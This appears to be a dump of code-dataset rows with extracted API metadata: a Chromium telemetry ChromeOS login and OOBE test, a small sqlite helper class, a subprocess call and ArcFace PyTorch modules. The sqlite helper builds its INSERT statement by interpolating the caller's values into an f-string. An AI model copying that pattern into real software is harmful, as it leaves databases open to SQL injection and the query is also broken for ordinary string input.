2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nimport json\nimport logging\nimport os\nimport unittest\n\nfrom telemetry.core import browser_finder\nfrom telemetry.core import exceptions\nfrom telemetry.core import extension_to_load\nfrom telemetry.core import util\nfrom telemetry.core.backends.chrome import cros_interface\nfrom telemetry.unittest import options_for_unittests\n\nclass CrOSAutoTest(unittest.TestCase):\n def setUp(self):\n options = options_for_unittests.GetCopy()\n self._cri = cros_interface.CrOSInterface(options.cros_remote,\n options.cros_ssh_identity)\n self._is_guest = options.browser_type == 'cros-chrome-guest'\n self._username = '' if self._is_guest else options.browser_options.username\n self._password = options.browser_options.password\n\n def _IsCryptohomeMounted(self):\n \"\"\"Returns True if cryptohome is mounted\"\"\"\n cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome',\n '--action=status'])\n cryptohomeStatus = json.loads(cryptohomeJSON)\n return (cryptohomeStatus['mounts'] and\n cryptohomeStatus['mounts'][0]['mounted'])\n\n def _CreateBrowser(self, autotest_ext=False, auto_login=True):\n \"\"\"Finds and creates a browser for tests. if autotest_ext is True,\n also loads the autotest extension\"\"\"\n options = options_for_unittests.GetCopy()\n\n if autotest_ext:\n extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext')\n self._load_extension = extension_to_load.ExtensionToLoad(\n path=extension_path,\n browser_type=options.browser_type,\n is_component=True)\n options.extensions_to_load = [self._load_extension]\n\n browser_to_create = browser_finder.FindBrowser(options)\n self.assertTrue(browser_to_create)\n options.browser_options.create_browser_with_oobe = True\n options.browser_options.auto_login = auto_login\n b = browser_to_create.Create()\n b.Start()\n return b\n\n def _GetAutotestExtension(self, browser):\n \"\"\"Returns the autotest extension instance\"\"\"\n extension = browser.extensions[self._load_extension]\n self.assertTrue(extension)\n return extension\n\n def _GetLoginStatus(self, browser):\n extension = self._GetAutotestExtension(browser)\n self.assertTrue(extension.EvaluateJavaScript(\n \"typeof('chrome.autotestPrivate') != 'undefined'\"))\n extension.ExecuteJavaScript('''\n window.__login_status = null;\n chrome.autotestPrivate.loginStatus(function(s) {\n window.__login_status = s;\n });\n ''')\n return util.WaitFor(\n lambda: extension.EvaluateJavaScript('window.__login_status'), 10)\n\n def testCryptohomeMounted(self):\n \"\"\"Verifies cryptohome mount status for regular and guest user and when\n logged out\"\"\"\n with self._CreateBrowser() as b:\n self.assertEquals(1, len(b.tabs))\n self.assertTrue(b.tabs[0].url)\n self.assertTrue(self._IsCryptohomeMounted())\n\n chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user')\n self.assertTrue(chronos_fs)\n if self._is_guest:\n self.assertEquals(chronos_fs, 'guestfs')\n else:\n home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path',\n 'user', self._username])\n self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()),\n chronos_fs)\n\n self.assertFalse(self._IsCryptohomeMounted())\n self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'),\n '/dev/mapper/encstateful')\n\n def testLoginStatus(self):\n \"\"\"Tests autotestPrivate.loginStatus\"\"\"\n with self._CreateBrowser(autotest_ext=True) as b:\n login_status = 
self._GetLoginStatus(b)\n self.assertEquals(type(login_status), dict)\n\n self.assertEquals(not self._is_guest, login_status['isRegularUser'])\n self.assertEquals(self._is_guest, login_status['isGuest'])\n self.assertEquals(login_status['email'], self._username)\n self.assertFalse(login_status['isScreenLocked'])\n\n def _IsScreenLocked(self, browser):\n return self._GetLoginStatus(browser)['isScreenLocked']\n\n def _LockScreen(self, browser):\n self.assertFalse(self._IsScreenLocked(browser))\n\n extension = self._GetAutotestExtension(browser)\n self.assertTrue(extension.EvaluateJavaScript(\n \"typeof chrome.autotestPrivate.lockScreen == 'function'\"))\n logging.info('Locking screen')\n extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();')\n\n logging.info('Waiting for the lock screen')\n def ScreenLocked():\n return (browser.oobe and\n browser.oobe.EvaluateJavaScript(\"typeof Oobe == 'function'\") and\n browser.oobe.EvaluateJavaScript(\n \"typeof Oobe.authenticateForTesting == 'function'\"))\n util.WaitFor(ScreenLocked, 10)\n self.assertTrue(self._IsScreenLocked(browser))\n\n def _AttemptUnlockBadPassword(self, browser):\n logging.info('Trying a bad password')\n def ErrorBubbleVisible():\n return not browser.oobe.EvaluateJavaScript('''\n document.getElementById('bubble').hidden\n ''')\n self.assertFalse(ErrorBubbleVisible())\n browser.oobe.ExecuteJavaScript('''\n Oobe.authenticateForTesting('%s', 'bad');\n ''' % self._username)\n util.WaitFor(ErrorBubbleVisible, 10)\n self.assertTrue(self._IsScreenLocked(browser))\n\n def _UnlockScreen(self, browser):\n logging.info('Unlocking')\n browser.oobe.ExecuteJavaScript('''\n Oobe.authenticateForTesting('%s', '%s');\n ''' % (self._username, self._password))\n util.WaitFor(lambda: not browser.oobe, 10)\n self.assertFalse(self._IsScreenLocked(browser))\n\n def testScreenLock(self):\n \"\"\"Tests autotestPrivate.screenLock\"\"\"\n with self._CreateBrowser(autotest_ext=True) as browser:\n self._LockScreen(browser)\n self._AttemptUnlockBadPassword(browser)\n self._UnlockScreen(browser)\n\n def testLogout(self):\n \"\"\"Tests autotestPrivate.logout\"\"\"\n with self._CreateBrowser(autotest_ext=True) as b:\n extension = self._GetAutotestExtension(b)\n try:\n extension.ExecuteJavaScript('chrome.autotestPrivate.logout();')\n except (exceptions.BrowserConnectionGoneException,\n exceptions.BrowserGoneException):\n pass\n util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20)\n\n def _SwitchRegion(self, region):\n self._cri.RunCmdOnDevice(['stop', 'ui'])\n\n # Change VPD (requires RW-enabled firmware).\n # To save time, region and initial_timezone are not set.\n vpd = {'initial_locale': region.language_code,\n 'keyboard_layout': region.keyboard}\n\n for (key, value) in vpd.items():\n self._cri.RunCmdOnDevice(['vpd', '-s', '\"%s\"=\"%s\"' % (key, value)])\n\n # Remove cached files to clear initial locale info and force regeneration.\n self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\\ State'])\n self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed'])\n self._cri.RunCmdOnDevice(['dump_vpd_log', '--force'])\n\n self._cri.RunCmdOnDevice(['start', 'ui'])\n\n def _OobeHasOption(self, browser, selectId, value):\n hasOptionJs = '''\n // Check that the option is present, and selected if it is the default.\n (function hasOption(selectId, value, isDefault) {\n var options = document.getElementById(selectId).options;\n for (var i = 0; i < options.length; i++) {\n if (options[i].value == value) {\n // The option is present. 
Make sure it's selected if necessary.\n return !isDefault || options.selectedIndex == i;\n }\n }\n return false;\n })(\"%s\", \"%s\", %s);\n '''\n return browser.oobe.EvaluateJavaScript(\n hasOptionJs % (selectId, value, 'true'))\n\n def _ResolveLanguage(self, locale):\n # If the locale matches a language but not the country, fall back to\n # an existing locale. See ui/base/l10n/l10n_util.cc.\n lang, _, region = map(str.lower, locale.partition('-'))\n if not region:\n return \"\"\n\n # Map from other countries to a localized country\n if lang == 'es' and region == 'es':\n return 'es-419'\n if lang == 'zh':\n if region in ('hk', 'mo'):\n return 'zh-TW'\n return 'zh-CN'\n if lang == 'en':\n if region in ('au', 'ca', 'nz', 'za'):\n return 'en-GB'\n return 'en-US'\n\n # No mapping found\n return \"\"\n\n def testOobeLocalization(self):\n \"\"\"Tests different region configurations at OOBE\"\"\"\n # Save the original device localization settings.\n # To save time, only read initial_locale and keyboard_layout.\n initial_region = self.Region('', '', '', '', '')\n initial_region.language_code, _ = self._cri.RunCmdOnDevice(\n ['vpd', '-g', 'initial_locale'])\n initial_region.keyboard, _ = self._cri.RunCmdOnDevice(\n ['vpd', '-g', 'keyboard_layout'])\n\n for region in self.REGIONS_LIST:\n self._SwitchRegion(region)\n with self._CreateBrowser(auto_login=False) as browser:\n # Ensure the dropdown lists have been created.\n util.WaitFor(lambda: browser.oobe.EvaluateJavaScript(\n 'document.getElementById(\"language-select\") != null'),\n 10)\n\n # Find the language, or an acceptable fallback value.\n languageFound = self._OobeHasOption(browser,\n 'language-select',\n region.language_code)\n if not languageFound:\n fallback = self._ResolveLanguage(region.language_code)\n self.assertTrue(fallback and\n self._OobeHasOption(browser,\n 'language-select',\n fallback))\n\n # Find the keyboard layout.\n self.assertTrue(self._OobeHasOption(\n browser, 'keyboard-select', region.keyboard))\n\n # Test is finished. Restore original region settings.\n self._SwitchRegion(initial_region)\n\n # The Region class and region list will be available in regions.py.\n class Region(object):\n def __init__(self, region_code, keyboard, time_zone, language_code,\n keyboard_mechanical_layout, description=None, notes=None):\n self.region_code = region_code\n self.keyboard = keyboard\n self.time_zone = time_zone\n self.language_code = language_code\n self.keyboard_mechanical_layout = keyboard_mechanical_layout\n self.description = description or region_code\n self.notes = notes\n\n class Enum(frozenset):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2'])\n _KML = KeyboardMechanicalLayout\n REGIONS_LIST = [\n Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI,\n 'Australia'),\n Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI,\n 'Canada (US keyboard)',\n 'Canada with US (ANSI) keyboard; see http://goto/cros-canada'),\n Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO,\n 'Canada (French keyboard)',\n ('Canadian French (ISO) keyboard. The most common configuration for '\n 'Canadian French SKUs. See http://goto/cros-canada')),\n Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO,\n 'Canada (hybrid)',\n ('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), '\n 'defaulting to English language and keyboard. 
Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA',\n _KML.ISO, 'Canada (multilingual)',\n (\"Canadian Multilingual keyboard; you probably don't want this. See \"\n \"http://goto/cros-canada\")),\n Region('de', 'xkb:de::ger', 'Europe/Berlin', 'de', _KML.ISO, 'Germany'),\n Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'),\n Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'),\n Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'),\n Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO,\n 'Ireland'),\n Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'),\n Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI,\n 'Malaysia'),\n Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI,\n 'Netherlands'),\n Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO,\n 'Nordics',\n ('Unified SKU for Sweden, Norway, and Denmark. This defaults '\n 'to Swedish keyboard layout, but starts with US English language '\n 'for neutrality. Use if there is a single combined SKU for Nordic '\n 'countries.')),\n Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden',\n (\"Use this if there separate SKUs for Nordic countries (Sweden, \"\n \"Norway, and Denmark), or the device is only shipping to Sweden. \"\n \"If there is a single unified SKU, use 'nordic' instead.\")),\n Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI,\n 'Singapore'),\n Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI,\n 'United States'),\n ]\n"},"apis":{"kind":"list like","value":["json.loads","telemetry.core.browser_finder.FindBrowser","telemetry.core.backends.chrome.cros_interface.CrOSInterface","telemetry.core.util.WaitFor","os.path.dirname","telemetry.unittest.options_for_unittests.GetCopy","telemetry.core.extension_to_load.ExtensionToLoad","logging.info"],"string":"[\n \"json.loads\",\n \"telemetry.core.browser_finder.FindBrowser\",\n \"telemetry.core.backends.chrome.cros_interface.CrOSInterface\",\n \"telemetry.core.util.WaitFor\",\n \"os.path.dirname\",\n \"telemetry.unittest.options_for_unittests.GetCopy\",\n \"telemetry.core.extension_to_load.ExtensionToLoad\",\n \"logging.info\"\n]"},"extract_api":{"kind":"string","value":"[((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\\n', (1189, 1205), False, 'import json\\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\\n', (1906, 1915), False, 'from telemetry.core import browser_finder\\n'), ((4602, 4632), 'logging.info', 'logging.info', (['\"\"\"Locking screen\"\"\"'], {}), 
\"('Locking screen')\\n\", (4614, 4632), False, 'import logging\\n'), ((4714, 4757), 'logging.info', 'logging.info', (['\"\"\"Waiting for the lock screen\"\"\"'], {}), \"('Waiting for the lock screen')\\n\", (4726, 4757), False, 'import logging\\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\\n', (5022, 5040), False, 'from telemetry.core import util\\n'), ((5149, 5186), 'logging.info', 'logging.info', (['\"\"\"Trying a bad password\"\"\"'], {}), \"('Trying a bad password')\\n\", (5161, 5186), False, 'import logging\\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\\n', (5524, 5548), False, 'from telemetry.core import util\\n'), ((5645, 5670), 'logging.info', 'logging.info', (['\"\"\"Unlocking\"\"\"'], {}), \"('Unlocking')\\n\", (5657, 5670), False, 'import logging\\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\\n', (5827, 5858), False, 'from telemetry.core import util\\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\\n .browser_type, is_component=True)\\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\\n', (1600, 1610), False, 'import os\\n')]"}}},{"rowIdx":759,"cells":{"code":{"kind":"string","value":"import sqlite3\n\n\nclass Database:\n def get_connection(self):\n return sqlite3.connect(\"./db.sqlite\")\n\n def add_card(self, card_title, card_text, card_link_text, card_link_url):\n con = self.get_connection()\n cur = con.cursor()\n\n create_table_query = \"CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR,\" + \\\n \" 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )\"\n insert_data_query = f\"INSERT INTO \" + \\\n f\"cards VALUES ({card_title}, {card_text}, {card_link_text}, {card_link_url})\"\n try:\n cur.execute(create_table_query)\n cur.execute(insert_data_query)\n con.commit()\n except:\n print(\"an error has been occurred !\")\n"},"apis":{"kind":"list like","value":["sqlite3.connect"],"string":"[\n \"sqlite3.connect\"\n]"},"extract_api":{"kind":"string","value":"[((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['\"\"\"./db.sqlite\"\"\"'], {}), \"('./db.sqlite')\\n\", (93, 108), False, 'import sqlite3\\n')]"}}},{"rowIdx":760,"cells":{"code":{"kind":"string","value":"import subprocess\nsubprocess.Popen(['sh', '../Switches/Switch3_On.sh'])\n"},"apis":{"kind":"list like","value":["subprocess.Popen"],"string":"[\n \"subprocess.Popen\"\n]"},"extract_api":{"kind":"string","value":"[((18, 71), 'subprocess.Popen', 'subprocess.Popen', ([\"['sh', '../Switches/Switch3_On.sh']\"], {}), \"(['sh', '../Switches/Switch3_On.sh'])\\n\", (34, 71), False, 'import subprocess\\n')]"}}},{"rowIdx":761,"cells":{"code":{"kind":"string","value":"from collections import namedtuple\n\nimport torch\nfrom torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d,\n Module, PReLU, ReLU, Sequential, Sigmoid)\n\n# yapf: disable\n\"\"\"\nArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa\n\"\"\"\n# yapf: enable\n\n\nclass Flatten(Module):\n \"\"\"Flatten 
Module.\"\"\"\n\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n\ndef l2_norm(input, axis=1):\n \"\"\"l2 normalization.\n\n Args:\n input (torch.Tensor): The input tensor.\n axis (int, optional): Specifies which axis of input to calculate the\n norm across. Defaults to 1.\n\n Returns:\n Tensor: Tensor after L2 normalization per-instance.\n \"\"\"\n norm = torch.norm(input, 2, axis, True)\n output = torch.div(input, norm)\n return output\n\n\nclass Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])):\n \"\"\"A named tuple describing a ResNet block.\"\"\"\n\n\ndef get_block(in_channel, depth, num_units, stride=2):\n \"\"\"Get a single block config.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n num_units (int): Number of unit modules.\n stride (int, optional): Conv2d stride. Defaults to 2.\n\n Returns:\n list: A list of unit modules' config.\n \"\"\"\n return [Bottleneck(in_channel, depth, stride)\n ] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)]\n\n\ndef get_blocks(num_layers):\n \"\"\"Get block configs of backbone.\n\n Args:\n num_layers (int): Number of ConvBlock layers in backbone.\n\n Raises:\n ValueError: `num_layers` must be one of [50, 100, 152].\n\n Returns:\n list: A list of block configs.\n \"\"\"\n if num_layers == 50:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=4),\n get_block(in_channel=128, depth=256, num_units=14),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n elif num_layers == 100:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=13),\n get_block(in_channel=128, depth=256, num_units=30),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n elif num_layers == 152:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=8),\n get_block(in_channel=128, depth=256, num_units=36),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n else:\n raise ValueError(\n 'Invalid number of layers: {}. 
Must be one of [50, 100, 152]'.\n format(num_layers))\n return blocks\n\n\nclass SEModule(Module):\n \"\"\"Squeeze-and-Excitation Modules.\n\n Args:\n channels (int): Input channels.\n reduction (int): Intermediate channels reduction ratio.\n \"\"\"\n\n def __init__(self, channels, reduction):\n super(SEModule, self).__init__()\n self.avg_pool = AdaptiveAvgPool2d(1)\n self.fc1 = Conv2d(\n channels,\n channels // reduction,\n kernel_size=1,\n padding=0,\n bias=False)\n self.relu = ReLU(inplace=True)\n self.fc2 = Conv2d(\n channels // reduction,\n channels,\n kernel_size=1,\n padding=0,\n bias=False)\n self.sigmoid = Sigmoid()\n\n def forward(self, x):\n \"\"\"Forward Function.\"\"\"\n module_input = x\n x = self.avg_pool(x)\n x = self.fc1(x)\n x = self.relu(x)\n x = self.fc2(x)\n x = self.sigmoid(x)\n return module_input * x\n\n\nclass bottleneck_IR(Module):\n \"\"\"Intermediate Resblock of bottleneck.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n\n def __init__(self, in_channel, depth, stride):\n \"\"\"Intermediate Resblock of bottleneck.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n super(bottleneck_IR, self).__init__()\n if in_channel == depth:\n self.shortcut_layer = MaxPool2d(1, stride)\n else:\n self.shortcut_layer = Sequential(\n Conv2d(in_channel, depth, (1, 1), stride, bias=False),\n BatchNorm2d(depth))\n self.res_layer = Sequential(\n BatchNorm2d(in_channel),\n Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),\n BatchNorm2d(depth))\n\n def forward(self, x):\n \"\"\"Forward function.\"\"\"\n shortcut = self.shortcut_layer(x)\n res = self.res_layer(x)\n return res + shortcut\n\n\nclass bottleneck_IR_SE(Module):\n \"\"\"Intermediate Resblock of bottleneck with SEModule.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n\n def __init__(self, in_channel, depth, stride):\n super(bottleneck_IR_SE, self).__init__()\n if in_channel == depth:\n self.shortcut_layer = MaxPool2d(1, stride)\n else:\n self.shortcut_layer = Sequential(\n Conv2d(in_channel, depth, (1, 1), stride, bias=False),\n BatchNorm2d(depth))\n self.res_layer = Sequential(\n BatchNorm2d(in_channel),\n Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),\n BatchNorm2d(depth), SEModule(depth, 16))\n\n def forward(self, x):\n \"\"\"Forward function.\"\"\"\n shortcut = self.shortcut_layer(x)\n res = self.res_layer(x)\n return res + shortcut\n"},"apis":{"kind":"list like","value":["torch.nn.Sigmoid","torch.nn.ReLU","collections.namedtuple","torch.nn.BatchNorm2d","torch.nn.Conv2d","torch.nn.PReLU","torch.norm","torch.nn.MaxPool2d","torch.nn.AdaptiveAvgPool2d","torch.div"],"string":"[\n \"torch.nn.Sigmoid\",\n \"torch.nn.ReLU\",\n \"collections.namedtuple\",\n \"torch.nn.BatchNorm2d\",\n \"torch.nn.Conv2d\",\n \"torch.nn.PReLU\",\n \"torch.norm\",\n \"torch.nn.MaxPool2d\",\n \"torch.nn.AdaptiveAvgPool2d\",\n \"torch.div\"\n]"},"extract_api":{"kind":"string","value":"[((890, 944), 'collections.namedtuple', 'namedtuple', (['\"\"\"Block\"\"\"', \"['in_channel', 'depth', 'stride']\"], {}), \"('Block', ['in_channel', 'depth', 'stride'])\\n\", (900, 944), False, 'from collections import namedtuple\\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', 
'(True)'], {}), '(input, 2, axis, True)\\n', (794, 816), False, 'import torch\\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\\n', (839, 852), False, 'import torch\\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\\n', (5388, 5399), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, 
Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, 